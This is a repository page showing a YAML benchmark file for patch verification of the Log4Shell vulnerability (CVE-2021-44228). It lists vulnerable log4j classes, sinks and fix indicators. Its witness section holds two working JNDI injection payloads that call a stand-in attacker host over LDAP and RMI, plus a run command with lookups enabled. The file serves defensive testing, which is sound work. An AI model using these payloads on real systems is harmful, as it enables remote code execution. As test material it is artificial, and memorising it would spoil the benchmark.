stella-ops.org/git.stella-ops.org
1
0
Fork 0
Code Issues Pull Requests Actions 2 Releases Wiki Activity
Files
main
git.stella-ops.org/bench/golden-corpus/golden-sets/CVE-2021-44228.golden.yaml
master 7f7eb8b228 Complete batch 012 (golden set diff) and 013 (advisory chat), fix build errors 
Sprints completed:
- SPRINT_20260110_012_* (golden set diff layer - 10 sprints)
- SPRINT_20260110_013_* (advisory chat - 4 sprints)

Build fixes applied:
- Fix namespace conflicts with Microsoft.Extensions.Options.Options.Create
- Fix VexDecisionReachabilityIntegrationTests API drift (major rewrite)
- Fix VexSchemaValidationTests FluentAssertions method name
- Fix FixChainGateIntegrationTests ambiguous type references
- Fix AdvisoryAI test files required properties and namespace aliases
- Add stub types for CveMappingController (ICveSymbolMappingService)
- Fix VerdictBuilderService static context issue

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-11 10:09:07 +02:00

130 lines
4.2 KiB
YAML
Raw Permalink Blame History

# Golden Set: CVE-2021-44228 (Log4Shell)
# Apache Log4j Remote Code Execution Vulnerability
#
# Sprint: SPRINT_20260110_012_010_TEST
# Task: GTV-001 - High-profile Golden Sets
#
# This golden set defines the vulnerability targets for CVE-2021-44228,
# allowing binary-level verification that a patch eliminates JNDI lookup.
id: "CVE-2021-44228"
version: "1.0.0"
created: "2026-01-11T12:00:00Z"
author: "stellaops-security"
status: "approved"
# Component identification
component:
name: "log4j-core"
ecosystem: "maven"
affectedVersions:
- ">=2.0-beta9,<2.15.0"
# Vulnerability details
vulnerability:
cveId: "CVE-2021-44228"
aliases:
- "Log4Shell"
- "LogJam"
severity: "CRITICAL"
cvssScore: 10.0
description: |
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages,
and parameters do not protect against attacker controlled LDAP and other
JNDI related endpoints. An attacker who can control log messages or log
message parameters can execute arbitrary code loaded from LDAP servers
when message lookup substitution is enabled.
references:
- url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
title: "NVD Entry"
- url: "https://logging.apache.org/log4j/2.x/security.html"
title: "Apache Security Advisory"
# Vulnerability targets
targets:
- function: "lookup"
className: "org/apache/logging/log4j/core/lookup/JndiLookup"
symbolPattern: "org/apache/logging/log4j/core/lookup/JndiLookup.lookup"
description: "JNDI lookup method - allows remote code execution"
criticalEdges:
- from: "method_entry"
to: "jndi_context_lookup"
description: "Entry to JNDI context lookup"
sinks:
- "javax/naming/Context.lookup"
- "javax/naming/InitialContext.<init>"
expectedPatchBehavior: "disable_jndi_lookup"
- function: "format"
className: "org/apache/logging/log4j/core/pattern/MessagePatternConverter"
symbolPattern: "org/apache/logging/log4j/core/pattern/MessagePatternConverter.format"
description: "Message pattern converter - triggers lookup substitution"
criticalEdges:
- from: "format_entry"
to: "substitute_call"
description: "Entry to variable substitution"
sinks:
- "org/apache/logging/log4j/core/lookup/StrSubstitutor.replace"
expectedPatchBehavior: "disable_lookup_substitution"
- function: "resolveVariable"
className: "org/apache/logging/log4j/core/lookup/StrSubstitutor"
symbolPattern: "org/apache/logging/log4j/core/lookup/StrSubstitutor.resolveVariable"
description: "Variable resolver - invokes JNDI lookup"
criticalEdges:
- from: "resolve_entry"
to: "interpolator_lookup"
description: "Entry to interpolator lookup"
sinks:
- "org/apache/logging/log4j/core/lookup/Interpolator.lookup"
expectedPatchBehavior: "add_jndi_filter"
# Witness data
witness:
command: "java -Dlog4j2.formatMsgNoLookups=false -jar target.jar"
inputs:
- name: "jndi_ldap_payload.txt"
description: "Log message with JNDI LDAP lookup"
content: "${jndi:ldap://attacker.com/a}"
trigger: "jndi_ldap_lookup"
- name: "jndi_rmi_payload.txt"
description: "Log message with JNDI RMI lookup"
content: "${jndi:rmi://attacker.com/a}"
trigger: "jndi_rmi_lookup"
# Verification criteria
verification:
fixIndicators:
- type: "class_removed"
className: "org/apache/logging/log4j/core/lookup/JndiLookup"
description: "JNDI lookup class removed (2.17.0+)"
- type: "method_disabled"
location: "JndiLookup.lookup"
description: "Lookup returns null or throws"
- type: "feature_flag"
flag: "log4j2.formatMsgNoLookups"
defaultValue: "true"
description: "Lookup disabled by default (2.15.0+)"
- type: "protocol_filter"
allowedProtocols: ["java", "ldap", "ldaps"]
description: "Protocol allowlist (2.15.0+)"
expectedConfidence:
fixed: 0.98
partial: 0.75
inconclusive: 0.40
# Metadata
metadata:
reviewedBy: "security-team"
reviewedAt: "2026-01-11T12:00:00Z"
approvedFor: "production"
kev: true # Known Exploited Vulnerability
cisa_due: "2021-12-24"
tags:
- "rce"
- "jndi"
- "log-injection"
- "critical"
- "kev"
Reference in New Issue View Git Blame Copy Permalink